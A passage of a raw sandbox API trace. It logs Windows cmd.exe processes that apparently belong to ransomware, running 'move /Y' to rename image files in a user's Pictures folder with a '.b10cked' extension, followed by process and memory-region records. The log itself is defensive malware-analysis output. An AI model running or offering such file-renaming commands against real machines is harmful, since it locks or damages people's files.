lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegCloseKey (hKey=0x40) returned 0x0 [0143.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec64 | out: phkResult=0x1aec64*=0x40) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x0, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x9, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.610] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x9, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.610] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x9, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.610] RegCloseKey (hKey=0x40) 
returned 0x0 [0143.610] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.610] srand (_Seed=0x5b886372) [0143.610] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"" [0143.610] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"" [0143.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.610] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.610] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.610] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.610] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.610] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.610] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.610] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.610] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.610] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.610] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.610] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.610] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.610] 
SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.611] GetEnvironmentStringsW () returned 0x3322d0* [0143.611] FreeEnvironmentStringsW (penv=0x3322d0) returned 1 [0143.611] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.611] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.611] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.611] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.611] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.611] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.611] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.611] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.611] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.611] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afa30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.611] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1afa30, lpFilePart=0x1afa2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1afa2c*="Desktop") returned 0x18 [0143.611] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.611] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af7ac | out: lpFindFileData=0x1af7ac) returned 0x330010 [0143.611] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0143.611] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af7ac | out: lpFindFileData=0x1af7ac) returned 0x330010 [0143.611] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0143.612] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af7ac | out: lpFindFileData=0x1af7ac) returned 0x330010 [0143.612] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0143.612] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.612] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.612] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.612] GetEnvironmentStringsW () returned 0x332af0* [0143.612] FreeEnvironmentStringsW (penv=0x332af0) returned 1 [0143.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.612] GetConsoleOutputCP () returned 0x1b5 [0143.613] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.613] GetUserDefaultLCID () returned 0x409 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afb70, cchData=128 | out: lpLCData="0") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afb70, cchData=128 | out: lpLCData="0") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afb70, cchData=128 | out: lpLCData="1") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 
[0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.613] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.614] GetConsoleTitleW (in: lpConsoleTitle=0x3208e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.614] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.614] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.614] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.615] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.615] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.615] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.615] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.615] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.615] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.615] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.617] GetConsoleTitleW (in: lpConsoleTitle=0x1af868, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.618] _wcsicmp (_String1="move", _String2="DIR") 
returned 9 [0143.618] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.618] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.618] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.618] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.618] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.618] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.618] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.618] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.618] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.618] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.618] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.618] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.618] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.618] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.618] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.618] _wcsicmp (_String1="move", 
_String2="TITLE") returned -7 [0143.618] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.618] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.618] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.618] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.620] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.620] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af624, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af61c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af61c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.620] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 
[0143.621] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.621] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.621] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.621] _wcsicmp (_String1="KYWWKR~1.JPG", _String2=".") returned 61 [0143.621] _wcsicmp (_String1="KYWWKR~1.JPG", _String2="..") returned 61 [0143.621] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkr~1.jpg")) returned 0x20 [0143.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.622] SetErrorMode (uMode=0x0) returned 0x0 [0143.622] SetErrorMode (uMode=0x1) returned 0x0 [0143.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", nBufferLength=0x104, lpBuffer=0x1aefac, lpFilePart=0x1aef94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", lpFilePart=0x1aef94*="KYWWKR~1.JPG") returned 0x26 [0143.622] SetErrorMode (uMode=0x0) returned 0x1 [0143.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0143.622] _wcsicmp (_String1="KYWWKR~1.JPG", _String2=".") returned 61 [0143.622] _wcsicmp (_String1="KYWWKR~1.JPG", _String2="..") returned 61 [0143.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkr~1.jpg")) returned 0x20 [0143.622] SetErrorMode (uMode=0x0) returned 0x0 [0143.622] SetErrorMode (uMode=0x1) returned 0x0 [0143.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", nBufferLength=0x104, lpBuffer=0x1af428, lpFilePart=0x1af1c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", lpFilePart=0x1af1c0*="KYWWKR~1.JPG") returned 0x26 [0143.622] SetErrorMode (uMode=0x0) returned 0x1 [0143.622] SetErrorMode (uMode=0x0) returned 0x0 [0143.622] SetErrorMode (uMode=0x1) returned 0x0 [0143.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1af630, lpFilePart=0x1af1c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", lpFilePart=0x1af1c0*="kYWWkRklabLUzyrJ9.jpg.b10cked") returned 0x37 [0143.623] SetErrorMode (uMode=0x0) returned 0x1 [0143.623] 
SetLastError (dwErrCode=0x0) [0143.623] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg.b10cked")) returned 0xffffffff [0143.623] GetLastError () returned 0x2 [0143.623] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x1aeb3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb3c) returned 0x320e58 [0143.623] FindNextFileW (in: hFindFile=0x320e58, lpFindFileData=0x1aeb3c | out: lpFindFileData=0x1aeb3c) returned 0 [0143.885] GetLastError () returned 0x12 [0143.885] FindClose (in: hFindFile=0x320e58 | out: hFindFile=0x320e58) returned 1 [0143.886] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x331bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bd8) returned 0x320e58 [0143.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked", lpFilePart=0x0) returned 0x37 [0143.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg", nBufferLength=0x104, lpBuffer=0x1aedd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg", lpFilePart=0x0) returned 0x2f [0143.886] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg")) returned 0x20 [0143.886] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked" (normalized: 
"c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.887] FindClose (in: hFindFile=0x320e58 | out: hFindFile=0x320e58) returned 1 [0143.887] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aed88 | out: _Buffer=" 1") returned 9 [0143.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.887] GetFileType (hFile=0x7) returned 0x2 [0143.887] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aed14 | out: lpMode=0x1aed14) returned 1 [0143.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.887] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aed48 | out: lpConsoleScreenBufferInfo=0x1aed48) returned 1 [0143.887] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.888] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aed88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.888] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aed6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aed6c*=0x1a) returned 1 [0143.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.889] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.889] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.889] SetConsoleInputExeNameW () returned 0x1 [0143.889] GetConsoleOutputCP () returned 0x1b5 [0143.889] GetCPInfo (in: 
CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.889] exit (_Code=0) Process: id = "189" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16de0" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16651 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16652 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16653 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16654 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 16655 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16656 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 
region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16657 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16658 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16659 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 16660 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16739 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16740 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16741 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16742 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16743 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 16744 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" 